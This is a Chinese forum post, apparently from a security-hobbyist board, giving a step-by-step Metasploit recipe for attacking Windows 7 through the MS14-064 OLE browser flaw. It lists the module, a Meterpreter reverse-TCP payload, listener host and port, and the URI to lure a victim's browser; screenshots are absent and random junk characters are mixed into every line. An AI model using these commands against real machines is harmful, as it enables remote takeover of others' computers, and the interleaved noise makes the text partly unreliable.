找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1397|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ j1 S+ [4 M7 e' k& m; ^5 [! p 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示, ^+ k- \' ]6 B8 z

# a& w1 }$ |; j _% U$ P2 T

' U0 ^8 m- c q% c5 ?7 Q% P 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 3 A, m1 _. `5 q! K' E w* L) k* K

r- z7 X, _& g8 O9 T5 A

& i) h+ k7 \- [) b 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp9 k* K2 k8 u+ L X% f

( N$ B. a# g" L

. P+ {7 x2 u+ L! e2 w: Y2 j. R1 K$ R. Z             set AllowPowershellPrompt true 5 U+ x2 E; T0 p/ _6 F

[7 S8 O z8 Z; @, y

+ h" W: U- ]7 Q, _: S4 b             Set LHOST 192.168.0.109. ~4 @# c; O' n0 {8 b1 W: V+ y

: ?7 a" K' B4 J S' P

9 B. M1 p0 {4 A& V+ Y             set SRVHOST 192.168.0.109+ Q# ^/ ]- A0 @6 O6 X

Q) i5 j. G V3 a

. ~$ z% M& Y3 l. X$ b1 j$ ]             Set uripath share 2 J' [. I. v6 [6 E

2 t9 P& o; Y8 P( l

' |9 t$ c' y7 ^6 y             Set srvport 80& u6 x% N* W0 F8 W2 L

, @: |. x( a: s0 L6 K7 r$ h

9 l5 }, X8 P8 f; o2 U" K0 h) I   6 W7 h5 L J# o: e$ ~- H

1 p; U" U# m* h8 s) C

, z, \9 Y" i7 R2 N5 V   9 w' `, P% L3 [6 n3 |( M P

1 W. o) ?. }8 }' x

! \, ]. Y, T" J$ R) n5 F   ! t+ `, L7 J) P3 `& y; R

& Z# |2 j2 O; F+ G2 x

. W& E: ^( a; ?  : {2 d' B( }+ H" F j1 P

5 E3 _$ t/ \. ]( F1 ?* b' y

3 l7 o5 g7 H- v0 Q; M: D& K  . J, E" S! s1 D- ]" b: o% J4 L

& F5 T. w, `$ e3 l+ N0 B! B' ~6 c& H

+ ^ R) }+ F9 u8 K 下面我们来访问本地地址如图: * \& }$ ^$ o+ U# I; G7 W- M

! N6 p( |( o' a- ?- _* R

* n2 l9 M/ z* R5 _  , i4 V% r( Z% T6 q

7 E8 Y8 p( V& q

: v4 ~) h8 g& I2 y* A6 C J  . D# ?! W& {' }( ?

1 \- n4 Z- ]+ T2 I

+ l% V# i2 l m2 H) K1 N2 p4 l U( b9 U: S& i+ D5 j0 P

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表